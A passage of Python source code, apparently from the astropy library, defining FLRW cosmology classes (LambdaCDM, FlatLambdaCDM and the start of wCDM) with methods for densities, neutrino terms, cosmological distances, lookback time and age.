pass class Cosmology(object): """ Placeholder for when a more general Cosmology class is implemented. """ pass class FLRW(Cosmology): """ A class describing an isotropic and homogeneous (Friedmann-Lemaitre-Robertson-Walker) cosmology. This is an abstract base class -- you can't instantiate examples of this class, but must work with one of its subclasses such as `LambdaCDM` or `wCDM`. Parameters ---------- H0 : float or scalar astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. Tcmb0 : float or scalar astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Setting this to zero will turn off both photons and neutrinos (even massive ones) Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Notes ----- Class instances are static -- you can't change the values of the parameters. That is, all of the attributes above are read only. """ __metaclass__ = ABCMeta def __init__(self, H0, Om0, Ode0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): # all densities are in units of the critical density self._Om0 = float(Om0) if self._Om0 < 0.0: raise ValueError("Matter density can not be negative") self._Ode0 = float(Ode0) self._Neff = float(Neff) if self._Neff < 0.0: raise ValueError("Effective number of neutrinos can " "not be negative") self.name = name # Tcmb may have units if isinstance(Tcmb0, u.Quantity): if not Tcmb0.isscalar: raise ValueError("Tcmb0 is a non-scalar quantity") self._Tcmb0 = Tcmb0.to(u.K) else: self._Tcmb0 = float(Tcmb0) * u.K # Hubble parameter at z=0, km/s/Mpc if isinstance(H0, u.Quantity): if not H0.isscalar: raise ValueError("H0 is a non-scalar quantity") self._H0 = H0.to(u.km / u.s / u.Mpc) else: self._H0 = float(H0) * u.km / u.s / u.Mpc # 100 km/s/Mpc * h = H0 (so h is dimensionless) self._h = self._H0.value / 100. # Hubble distance self._hubble_distance = (const.c / self._H0).to(u.Mpc) # H0 in s^-1 H0_s = self._H0.to(1.0 / u.s) # Hubble time self._hubble_time = (1. / H0_s).to(u.Gyr) # critical density at z=0 (grams per cubic cm) self._critical_density0 = (3. * H0_s ** 2 / (8. * pi * const.G.cgs)).cgs # Load up neutrino masses. self._nneutrinos = floor(self._Neff) # We are going to share Neff between the neutrinos equally. # In detail this is not correct, but it is a standard assumption # because propertly calculating it is a) complicated b) depends # on the details of the massive nuetrinos (e.g., their weak # interactions, which could be unusual if one is considering sterile # neutrinos) self._massivenu = False if self._nneutrinos > 0 and self._Tcmb0.value > 0: self._neff_per_nu = self._Neff / self._nneutrinos if not isinstance(m_nu, u.Quantity): raise ValueError("m_nu must be a Quantity") m_nu = m_nu.to(u.eV, equivalencies=u.mass_energy()) # Now, figure out if we have massive neutrinos to deal with, # and, if so, get the right number of masses # It is worth the effort to keep track of massless ones seperately # (since they are quite easy to deal with, and a common use case # is to set only one neutrino to have mass) if m_nu.isscalar: # Assume all neutrinos have the same mass if m_nu.value == 0: self._nmasslessnu = self._nneutrinos self._nmassivenu = 0 else: self._massivenu = True self._nmasslessnu = 0 self._nmassivenu = self._nneutrinos self._massivenu_mass = (m_nu.value * np.ones(self._nneutrinos)) else: # Make sure we have the right number of masses # -unless- they are massless, in which case we cheat a little if m_nu.value.min() < 0: raise ValueError("Invalid (negative) neutrino mass" " encountered") if m_nu.value.max() == 0: self._nmasslessnu = self._nneutrinos self._nmassivenu = 0 else: self._massivenu = True if len(m_nu) != self._nneutrinos: raise ValueError("Unexpected number of neutrino masses") # Segregate out the massless ones try: # Numpy < 1.6 doesn't have count_nonzero self._nmasslessnu = np.count_nonzero(m_nu.value == 0) except AttributeError: self._nmasslessnu = len(np.nonzero(m_nu.value == 0)[0]) self._nmassivenu = self._nneutrinos - self._nmasslessnu w = np.nonzero(m_nu.value > 0)[0] self._massivenu_mass = m_nu[w] # Compute photon density, Tcmb, neutrino parameters # Tcmb0=0 removes both photons and neutrinos, is handled # as a special case for efficiency if self._Tcmb0.value > 0: # Compute photon density from Tcmb self._Ogamma0 = a_B_c2 * self._Tcmb0.value ** 4 /\ self._critical_density0.value # Compute Neutrino temperature # The constant in front is (4/11)^1/3 -- see any # cosmology book for an explanation -- for example, # Weinberg 'Cosmology' p 154 eq (3.1.21) self._Tnu0 = 0.7137658555036082 * self._Tcmb0 # Compute Neutrino Omega and total relativistic component # for massive neutrinos if self._massivenu: nu_y = self._massivenu_mass / (kB_evK * self._Tnu0) self._nu_y = nu_y.value self._Onu0 = self._Ogamma0 * self.nu_relative_density(0) else: # This case is particularly simple, so do it directly # The 0.2271... is 7/8 (4/11)^(4/3) -- the temperature # bit ^4 (blackbody energy density) times 7/8 for # FD vs. BE statistics. self._Onu0 = 0.22710731766 * self._Neff * self._Ogamma0 else: self._Ogamma0 = 0.0 self._Tnu0 = u.Quantity(0.0, u.K) self._Onu0 = 0.0 # Compute curvature density self._Ok0 = 1.0 - self._Om0 - self._Ode0 - self._Ogamma0 - self._Onu0 def _namelead(self): """ Helper function for constructing __repr__""" if self.name is None: return "{0:s}(".format(self.__class__.__name__) else: return "{0:s}(name=\"{1:s}\", ".format(self.__class__.__name__, self.name) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, "\ "Tcmb0={4:.4g}, Neff={5:.3g}, m_nu={6:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._Tcmb0, self._Neff, self.m_nu) # Set up a set of properties for H0, Om0, Ode0, Ok0, etc. for user access. # Note that we don't let these be set (so, obj.Om0 = value fails) @property def H0(self): """ Return the Hubble constant as an astropy.units.Quantity at z=0""" return self._H0 @property def Om0(self): """ Omega matter; matter density/critical density at z=0""" return self._Om0 @property def Ode0(self): """ Omega dark energy; dark energy density/critical density at z=0""" return self._Ode0 @property def Ok0(self): """ Omega curvature; the effective curvature density/critical density at z=0""" return self._Ok0 @property def Tcmb0(self): """ Temperature of the CMB as astropy.units.Quantity at z=0""" return self._Tcmb0 @property def Tnu0(self): """ Temperature of the neutrino background as astropy.units.Quantity at z=0""" return self._Tnu0 @property def Neff(self): """ Number of effective neutrino species""" return self._Neff @property def has_massive_nu(self): """ Does this cosmology have at least one massive neutrino species?""" if self._Tnu0.value == 0: return False return self._massivenu @property def m_nu(self): """ Mass of neutrino species""" if self._Tnu0.value == 0: return None if not self._massivenu: # Only massless return u.Quantity(np.zeros(self._nmasslessnu), u.eV) if self._nmasslessnu == 0: # Only massive return u.Quantity(self._massivenu_mass, u.eV) # A mix -- the most complicated case return u.Quantity(np.append(np.zeros(self._nmasslessnu), self._massivenu_mass.value), u.eV) @property def h(self): """ Dimensionless Hubble constant: h = H_0 / 100 [km/sec/Mpc]""" return self._h @property def hubble_time(self): """ Hubble time as astropy.units.Quantity""" return self._hubble_time @property def hubble_distance(self): """ Hubble distance as astropy.units.Quantity""" return self._hubble_distance @property def critical_density0(self): """ Critical density as astropy.units.Quantity at z=0""" return self._critical_density0 @property def Ogamma0(self): """ Omega gamma; the density/critical density of photons at z=0""" return self._Ogamma0 @property def Onu0(self): """ Omega nu; the density/critical density of neutrinos at z=0""" return self._Onu0 @abstractmethod def w(self, z): """ The dark energy equation of state. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. This must be overridden by subclasses. """ raise NotImplementedError("w(z) is not implemented") def Om(self, z): """ Return the density parameter for non-relativistic matter at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Om : ndarray, or float if input scalar The density of non-relativistic matter relative to the critical density at each redshift. """ if isiterable(z): z = np.asarray(z) return self._Om0 * (1. + z) ** 3 * self.inv_efunc(z) ** 2 def Ok(self, z): """ Return the equivalent density parameter for curvature at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Ok : ndarray, or float if input scalar The equivalent density parameter for curvature at each redshift. """ if self._Ok0 == 0: # Common enough case to be worth checking return np.zeros_like(z) if isiterable(z): z = np.asarray(z) return self._Ok0 * (1. + z) ** 2 * self.inv_efunc(z) ** 2 def Ode(self, z): """ Return the density parameter for dark energy at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Ode : ndarray, or float if input scalar The density of non-relativistic matter relative to the critical density at each redshift. """ if self._Ode0 == 0: return np.zeros_like(z) return self._Ode0 * self.de_density_scale(z) * self.inv_efunc(z) ** 2 def Ogamma(self, z): """ Return the density parameter for photons at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Ogamma : ndarray, or float if input scalar The energy density of photons relative to the critical density at each redshift. """ if self._Ogamma0 == 0: # Common enough case to be worth checking (although it clearly # doesn't represent any real universe) return np.zeros_like(z) if isiterable(z): z = np.asarray(z) return self._Ogamma0 * (1. + z) ** 4 * self.inv_efunc(z) ** 2 def Onu(self, z): """ Return the density parameter for massless neutrinos at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Onu : ndarray, or float if input scalar The energy density of photons relative to the critical density at each redshift. Note that this includes their kinetic energy (if they have mass), so it is not equal to the commonly used :math:`\\sum \\frac{m_{\\nu}}{94 eV}`, which does not include kinetic energy. """ if self._Onu0 == 0: # Common enough case to be worth checking (although it clearly # doesn't represent any real universe) return np.zeros_like(z) if isiterable(z): z = np.asarray(z) return self.Ogamma(z) * self.nu_relative_density(z) def Tcmb(self, z): """ Return the CMB temperature at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Tcmb : astropy.units.Quantity The temperature of the CMB in K. """ if isiterable(z): z = np.asarray(z) return self._Tcmb0 * (1.0 + z) def Tnu(self, z): """ Return the neutrino temperature at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Tnu : astropy.units.Quantity The temperature of the cosmic neutrino background in K. """ if isiterable(z): z = np.asarray(z) return self._Tnu0 * (1.0 + z) def nu_relative_density(self, z): """ Neutrino density function relative to the energy density in photons. Parameters ---------- z : array like Redshift Returns ------- f : ndarray, or float if z is scalar The neutrino density scaling factor relative to the density in photons at each redshift Notes ----- The density in neutrinos is given by .. math:: \\rho_{\\nu} \\left(a\\right) = 0.2271 \\, N_{eff} \\, f\\left(m_{\\nu} a / T_{\\nu 0} \\right) \\, \\rho_{\\gamma} \\left( a \\right) where .. math:: f \\left(y\\right) = \\frac{120}{7 \\pi^4} \\int_0^{\\infty} \\, dx \\frac{x^2 \\sqrt{x^2 + y^2}} {e^x + 1} assuming that all neutrino species have the same mass. If they have different masses, a similar term is calculated for each one. Note that f has the asymptotic behavior :math:`f(0) = 1`. This method returns :math:`0.2271 f` using an analytical fitting formula given in Komatsu et al. 2011, ApJS 192, 18. """ # See Komatsu et al. 2011, eq 26 and the surrounding discussion # However, this is modified to handle multiple neutrino masses # by computing the above for each mass, then summing prefac = 0.22710731766 # 7/8 (4/11)^4/3 -- see any cosmo book # The massive and massless contribution must be handled seperately # But check for common cases first if not self._massivenu: return prefac * self._Neff * np.ones_like(z) p = 1.83 invp = 1.0 / 1.83 if np.isscalar(z): curr_nu_y = self._nu_y / (1.0 + z) # only includes massive ones rel_mass_per = (1.0 + (0.3173 * curr_nu_y) ** p) ** invp rel_mass = rel_mass_per.sum() + self._nmasslessnu return prefac * self._neff_per_nu * rel_mass else: z = np.asarray(z) retarr = np.empty_like(z) for i, redshift in enumerate(z): curr_nu_y = self._nu_y / (1.0 + redshift) rel_mass_per = (1.0 + (0.3173 * curr_nu_y) ** p) ** invp rel_mass = rel_mass_per.sum() + self._nmasslessnu retarr[i] = prefac * self._neff_per_nu * rel_mass return retarr def _w_integrand(self, ln1pz): """ Internal convenience function for w(z) integral.""" # See Linder 2003, PRL 90, 91301 eq (5) # Assumes scalar input, since this should only be called # inside an integral z = exp(ln1pz) - 1.0 return 1.0 + self.w(z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and is given by .. math:: I = \\exp \\left( 3 \int_{a}^1 \\frac{ da^{\\prime} }{ a^{\\prime} } \\left[ 1 + w\\left( a^{\\prime} \\right) \\right] \\right) It will generally helpful for subclasses to overload this method if the integral can be done analytically for the particular dark energy equation of state that they implement. """ # This allows for an arbitrary w(z) following eq (5) of # Linder 2003, PRL 90, 91301. The code here evaluates # the integral numerically. However, most popular # forms of w(z) are designed to make this integral analytic, # so it is probably a good idea for subclasses to overload this # method if an analytic form is available. # # The integral we actually use (the one given in Linder) # is rewritten in terms of z, so looks slightly different than the # one in the documentation string, but it's the same thing. from scipy.integrate import quad if isiterable(z): z = np.asarray(z) ival = np.array([quad(self._w_integrand, 0, log(1 + redshift))[0] for redshift in z]) return np.exp(3 * ival) else: ival = quad(self._w_integrand, 0, log(1 + z))[0] return exp(3 * ival) def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. It is not necessary to override this method, but if de_density_scale takes a particularly simple form, it may be advantageous to. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * self.de_density_scale(z)) def inv_efunc(self, z): """Inverse of efunc. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the inverse Hubble constant. """ # Avoid the function overhead by repeating code if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * self.de_density_scale(z)) def _tfunc(self, z): """ Integrand of the lookback time. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The integrand for the lookback time References ---------- Eqn 30 from Hogg 1999. """ if isiterable(z): zp1 = 1.0 + np.asarray(z) else: zp1 = 1. + z return 1.0 / (zp1 * self.efunc(z)) def _xfunc(self, z): """ Integrand of the absorption distance. Parameters ---------- z : array_like Input redshifts. Returns ------- X : ndarray, or float if input scalar The integrand for the absorption distance References ---------- See Hogg 1999 section 11. """ if isiterable(z): zp1 = 1.0 + np.asarray(z) else: zp1 = 1. + z return zp1 ** 2 / self.efunc(z) def H(self, z): """ Hubble parameter (km/s/Mpc) at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- H : astropy.units.Quantity Hubble parameter at each input redshift. """ return self._H0 * self.efunc(z) def scale_factor(self, z): """ Scale factor at redshift `z`. The scale factor is defined as :math:`a = 1 / (1 + z)`. Parameters ---------- z : array_like Input redshifts. Returns ------- a : ndarray, or float if input scalar Scale factor at each input redshift. """ if isiterable(z): z = np.asarray(z) return 1. / (1. + z) def lookback_time(self, z): """ Lookback time in Gyr to redshift `z`. The lookback time is the difference between the age of the Universe now and the age at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- t : astropy.units.Quantity Lookback time in Gyr to each input redshift. """ from scipy.integrate import quad if not isiterable(z): return self._hubble_time * quad(self._tfunc, 0, z)[0] out = np.array([quad(self._tfunc, 0, redshift)[0] for redshift in z]) return self._hubble_time * np.array(out) def age(self, z): """ Age of the universe in Gyr at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- t : astropy.units.Quantity The age of the universe in Gyr at each input redshift. """ from scipy.integrate import quad if not isiterable(z): return self._hubble_time * quad(self._tfunc, z, np.inf)[0] out = [quad(self._tfunc, redshift, np.inf)[0] for redshift in z] return self._hubble_time * np.array(out) def critical_density(self, z): """ Critical density in grams per cubic cm at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- rho : astropy.units.Quantity Critical density in g/cm^3 at each input redshift. """ return self._critical_density0 * (self.efunc(z)) ** 2 def comoving_distance(self, z): """ Comoving line-of-sight distance in Mpc at a given redshift. The comoving distance along the line-of-sight between two objects remains constant with time for objects in the Hubble flow. Parameters ---------- z : array_like Input redshifts. Returns ------- d : ndarray, or float if input scalar Comoving distance in Mpc to each input redshift. """ from scipy.integrate import quad if not isiterable(z): return self._hubble_distance * quad(self.inv_efunc, 0, z)[0] out = [quad(self.inv_efunc, 0, redshift)[0] for redshift in z] return self._hubble_distance * np.array(out) def comoving_transverse_distance(self, z): """ Comoving transverse distance in Mpc at a given redshift. This value is the transverse comoving distance at redshift `z` corresponding to an angular separation of 1 radian. This is the same as the comoving distance if omega_k is zero (as in the current concordance lambda CDM model). Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity Comoving transverse distance in Mpc at each input redshift. Notes ----- This quantity also called the 'proper motion distance' in some texts. """ Ok0 = self._Ok0 dc = self.comoving_distance(z) if Ok0 == 0: return dc sqrtOk0 = sqrt(abs(Ok0)) dh = self._hubble_distance if Ok0 > 0: return dh / sqrtOk0 * np.sinh(sqrtOk0 * dc.value / dh.value) else: return dh / sqrtOk0 * np.sin(sqrtOk0 * dc.value / dh.value) def angular_diameter_distance(self, z): """ Angular diameter distance in Mpc at a given redshift. This gives the proper (sometimes called 'physical') transverse distance corresponding to an angle of 1 radian for an object at redshift `z`. Weinberg, 1972, pp 421-424; Weedman, 1986, pp 65-67; Peebles, 1993, pp 325-327. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity Angular diameter distance in Mpc at each input redshift. """ if isiterable(z): z = np.asarray(z) return self.comoving_transverse_distance(z) / (1. + z) def luminosity_distance(self, z): """ Luminosity distance in Mpc at redshift `z`. This is the distance to use when converting between the bolometric flux from an object at redshift `z` and its bolometric luminosity. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity Luminosity distance in Mpc at each input redshift. References ---------- Weinberg, 1972, pp 420-424; Weedman, 1986, pp 60-62. """ if isiterable(z): z = np.asarray(z) return (1. + z) * self.comoving_transverse_distance(z) def angular_diameter_distance_z1z2(self, z1, z2): """ Angular diameter distance between objects at 2 redshifts. Useful for gravitational lensing. Parameters ---------- z1, z2 : array_like, shape (N,) Input redshifts. z2 must be large than z1. Returns ------- d : astropy.units.Quantity, shape (N,) or single if input scalar The angular diameter distance between each input redshift pair. Raises ------ CosmologyError If omega_k is < 0. Notes ----- This method only works for flat or open curvature (omega_k >= 0). """ # does not work for negative curvature Ok0 = self._Ok0 if Ok0 < 0: raise CosmologyError('Ok0 must be >= 0 to use this method.') outscalar = False if not isiterable(z1) and not isiterable(z2): outscalar = True z1 = np.atleast_1d(z1) z2 = np.atleast_1d(z2) if z1.size != z2.size: raise ValueError('z1 and z2 must be the same size.') if (z1 > z2).any(): raise ValueError('z2 must greater than z1') # z1 < z2 if (z2 < z1).any(): z1, z2 = z2, z1 dm1 = self.comoving_transverse_distance(z1).value dm2 = self.comoving_transverse_distance(z2).value dh_2 = self._hubble_distance.value ** 2 if Ok0 == 0: # Common case worth checking out = (dm2 - dm1) / (1. + z2) else: out = ((dm2 * np.sqrt(1. + Ok0 * dm1 ** 2 / dh_2) - dm1 * np.sqrt(1. + Ok0 * dm2 ** 2 / dh_2)) / (1. + z2)) if outscalar: return u.Quantity(out[0], u.Mpc) return u.Quantity(out, u.Mpc) def absorption_distance(self, z): """ Absorption distance at redshift `z`. This is used to calculate the number of objects with some cross section of absorption and number density intersecting a sightline per unit redshift path. Parameters ---------- z : array_like Input redshifts. Returns ------- d : float or ndarray Absorption distance (dimensionless) at each input redshift. References ---------- Hogg 1999 Section 11. (astro-ph/9905116) Bahcall, . and . 1969, ApJ, 156L, 7B """ from scipy.integrate import quad if not isiterable(z): return quad(self._xfunc, 0, z)[0] out = np.array([quad(self._xfunc, 0, redshift)[0] for redshift in z]) return out def distmod(self, z): """ Distance modulus at redshift `z`. The distance modulus is defined as the (apparent magnitude - absolute magnitude) for an object at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- distmod : astropy.units.Quantity Distance modulus at each input redshift, in magnitudes """ # Remember that the luminosity distance is in Mpc val = 5. * np.log10(self.luminosity_distance(z).value * 1.e5) return u.Quantity(val, u.mag) def comoving_volume(self, z): """ Comoving volume in cubic Mpc at redshift `z`. This is the volume of the universe encompassed by redshifts less than `z`. For the case of omega_k = 0 it is a sphere of radius `comoving_distance(z)` but it is less intuitive if omega_k is not 0. Parameters ---------- z : array_like Input redshifts. Returns ------- V : astropy.units.Quantity Comoving volume in :math:`Mpc^3` at each input redshift. """ Ok0 = self._Ok0 if Ok0 == 0: return 4. / 3. * pi * self.comoving_distance(z) ** 3 dh = self._hubble_distance.value # .value for speed dm = self.comoving_transverse_distance(z).value term1 = 4. * pi * dh ** 3 / (2. * Ok0) * u.Mpc ** 3 term2 = dm / dh * np.sqrt(1 + Ok0 * (dm / dh) ** 2) term3 = sqrt(abs(Ok0)) * dm / dh if Ok0 > 0: return term1 * (term2 - 1. / sqrt(abs(Ok0)) * np.arcsinh(term3)) else: return term1 * (term2 - 1. / sqrt(abs(Ok0)) * np.arcsin(term3)) def kpc_comoving_per_arcmin(self, z): """ Separation in transverse comoving kpc corresponding to an arcminute at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity The distance in comoving kpc corresponding to an arcmin at each input redshift. """ return (self.comoving_transverse_distance(z).to(u.kpc) * arcmin_in_radians / u.arcmin) def kpc_proper_per_arcmin(self, z): """ Separation in transverse proper kpc corresponding to an arcminute at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity The distance in proper kpc corresponding to an arcmin at each input redshift. """ return (self.angular_diameter_distance(z).to(u.kpc) * arcmin_in_radians / u.arcmin) def arcsec_per_kpc_comoving(self, z): """ Angular separation in arcsec corresponding to a comoving kpc at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- theta : astropy.units.Quantity The angular separation in arcsec corresponding to a comoving kpc at each input redshift. """ return u.arcsec / (self.comoving_transverse_distance(z).to(u.kpc) * arcsec_in_radians) def arcsec_per_kpc_proper(self, z): """ Angular separation in arcsec corresponding to a proper kpc at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- theta : astropy.units.Quantity The angular separation in arcsec corresponding to a proper kpc at each input redshift. """ return u.arcsec / (self.angular_diameter_distance(z).to(u.kpc) * arcsec_in_radians) class LambdaCDM(FLRW): """FLRW cosmology with a cosmological constant and curvature. This has no additional attributes beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of the cosmological constant in units of the critical density at z=0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import LambdaCDM >>> cosmo = LambdaCDM(H0=70, Om0=0.3, Ode0=0.7) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = -1`. """ return -1.0 * np.ones_like(z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by :math:`I = 1`. """ return np.ones_like(z) def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) # We override this because it takes a particularly simple # form for a cosmological constant Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0) def inv_efunc(self, z): r""" Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0) class FlatLambdaCDM(LambdaCDM): """FLRW cosmology with a cosmological constant and no curvature. This has no additional attributes beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import FlatLambdaCDM >>> cosmo = FlatLambdaCDM(H0=70, Om0=0.3) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, 0.0, Tcmb0, Neff, m_nu, name=name) # Do some twiddling after the fact to get flatness self._Ode0 = 1.0 - self._Om0 - self._Ogamma0 - self._Onu0 self._Ok0 = 0.0 def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) # We override this because it takes a particularly simple # form for a cosmological constant Om0, Ode0 = self._Om0, self._Ode0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0) def inv_efunc(self, z): r"""Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0 = self._Om0, self._Ode0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Tcmb0={3:.4g}, "\ "Neff={4:.3g}, m_nu={5:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Tcmb0, self._Neff, self.m_nu) class wCDM(FLRW): """FLRW cosmology with a constant dark energy equation of state and curvature. This has one additional attribute beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. w0 : float Dark energy equation of state at all redshifts. This is pressure/density for dark energy in units where c=1. A cosmological constant has w0=-1.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and 